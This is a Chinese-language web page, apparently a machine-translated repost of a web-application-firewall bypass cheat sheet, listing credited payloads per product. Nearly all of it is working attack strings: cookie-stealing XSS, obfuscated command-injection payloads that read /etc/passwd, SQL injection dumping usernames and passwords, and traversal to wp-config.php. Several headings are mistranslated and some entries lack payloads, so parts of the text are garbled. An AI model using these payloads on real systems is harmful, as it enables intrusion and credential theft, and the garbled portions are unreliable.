Imperva SecureSphere <= v13 - Privilege Escalation by @0x09AL

Kona SiteDefender

HTML注入@ sp1d3rs

%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E

XSS绕过@Jonathan Bouman

<body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)"

XSS绕过@zseano

?"></script><base%20c%3D=href%3Dhttps:\mysite>

XSS绕过@ 0xInfection

XSS绕过@ sp1d3rs

%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E

XSS绕过@FransRosén

XSS绕过@Ishaq Mohammed

<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

专业

@Michael Brooks的GET Type CSRF攻击（> = v.2.6.2）

关闭Proface机器

添加代理

@Michael Brooks的XSS绕过（> = v.2.6.2）

https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>

XSS绕过@EnableSecurity（> = v2.4）

%3CEvil%20script%20goes%20here%3E=%0AByPass

%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E

快速防御

XSS绕过@WAFNinja

?<input type="search" onsearch="aler\u0074(1)">

苏库里

通过@theMiddle走私RCE有效负载

/???/??t+/???/??ss??

通过@theMiddle混淆RCE有效负载

;+cat+/e'tc/pass'wd

c\\a\\t+/et\\c/pas\\swd

XSS绕过@Luka

"><input/onauxclick="[1].map(prompt)">

XSS绕过@Brute Logic

data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post>

URL扫描

@ ZeQ3uL（<= v3.1）进行目录遍历（仅在ASP.NET上）

http://host.com/test.asp?file=.%./bla.txt

WebARX

@ 0xInfection的跨站点脚本

<a69/onauxclick=open&#40&#41>rightclickhere

Web骑士

@WAFNinja的跨站点脚本

<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">

@WAFNinja编写的SQLi

0 union(select 1,username,password from(users))

0 union(select 1,@@hostname,@@datadir)

XSS绕过@Aatif Khan（v4.1）

<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">

SQLi绕过@ ZeQ3uL

10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

围栏

XSS绕过@brute Logic

XSS绕过@ 0xInfection

<a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At&colon;/**/alert()/**/>click

@Voxel的HTML注入

http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

@MustLive（> = v3.3.5）的XSS漏洞

<html>

<head>

http://websecurity.com.ua</title>

</head>

<input type="hidden" name="email"

value="<script>alert(document.cookie)</script>">

</form>

</body>

</html>

其他XSS绕过

<meter onmouseover="alert(1)"

'">><div><meter onmouseover="alert(1)"</div>"

>><marquee loop=1 width=0 onfinish=alert(1)>

通用Apache

@ i_bo0om以小写形式编写方法类型

get /login HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

IIS通用

@ i_bo0om方法之前的标签

GET /login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

点击数：391

发送评论 编辑评论

推荐文章

发送评论编辑评论